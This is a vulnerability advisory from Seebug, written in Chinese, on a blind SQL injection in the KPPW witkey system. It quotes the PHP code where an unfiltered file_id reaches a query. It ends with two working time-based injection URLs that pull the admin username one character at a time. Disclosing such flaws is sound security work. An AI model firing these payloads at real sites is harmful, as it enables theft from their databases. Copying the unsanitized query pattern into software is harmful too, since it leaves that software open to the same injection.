kppw威客系统SQL盲注漏洞

2014-04-25T00:00:00
ID SSV:94531
Type seebug
Reporter Root
Modified 2014-04-25T00:00:00

Description

简要描述:

kppw威客系统SQL盲注漏洞

详细说明:

文件:/control/ajax/ajax_file.php

case "delete": $res = keke_file_class::del_att_file($file_id, $filepath); $res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' ); die (); break;

进入del_att_file函数: static function del_att_file($fid = 0, $filepath = '', $del_more = '') { $file_obj = new Keke_witkey_file_class (); if ($fid > 0) { $where = 'file_id=' . $fid; $filepath != '' && $where .= ' and save_name="' . $filepath . '"'; $file_obj->setWhere ( $where ); $file_info = $file_obj->query_keke_witkey_file (); $file_obj->setWhere ( $where ); $res = $file_obj->del_keke_witkey_file (); $filepath = $file_info [0] ['save_name']; if (is_file ( $filepath )) { $unlink = unlink ( $filepath ); if ($del_more != '') { $more_name = array (); $dirname = dirname ( $filepath ); $dirname = $dirname . '/'; $basename = basename ( $filepath ); $size_arr = explode ( ',', $del_more ); for($i = 0; $i < sizeof ( $size_arr ); $i ++) { unlink ( $dirname . $size_arr [$i] . '_' . $basename ); } } } return $unlink ? $unlink : $res; } 进入query_keke_witkey_file函数:

function query_keke_witkey_file($is_cache=0, $cache_time=0){ if($this-&gt;_where){ $sql = "select * from $this-&gt;_tablename where ".$this-&gt;_where; } else{ $sql = "select * from $this-&gt;_tablename"; } if ($is_cache) { $this-&gt;_cache_config ['is_cache'] = $is_cache; } if ($cache_time) { $this-&gt;_cache_config ['time'] = $cache_time; } if ($this-&gt;_cache_config ['is_cache']) { if (CACHE_TYPE) { $keke_cache = new keke_cache_class ( CACHE_TYPE ); $id = $this-&gt;_tablename . ($this-&gt;_where?"_" .substr(md5 ( $this-&gt;_where ),0,6):''); $data = $keke_cache-&gt;get ( $id ); if ($data) { return $data; } else { $res = $this-&gt;_dbop-&gt;query ( $sql ); $keke_cache-&gt;set ( $id, $res,$this-&gt;_cache_config['time'] ); $this-&gt;_where = ""; return $res; } } }else{ $this-&gt;_where = ""; return $this-&gt;_dbop-&gt;query ( $sql ); } }

在拼接SQL语句时: $where = 'file_id=' . $fid; $sql = "select * from $this->_tablename where ".$this->_where; file_id没有过滤,导致sql注入。

漏洞证明:

利用证明:

http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x61,sleep(5), 1)%23&filepath=123

返回正常。

http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x62,sleep(5), 1)%23&filepath=123

返回错误,延迟5秒后返回